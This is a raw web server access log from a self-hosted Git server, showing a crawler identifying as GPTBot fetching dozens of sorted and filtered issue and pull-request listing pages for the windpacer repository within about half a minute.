"/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 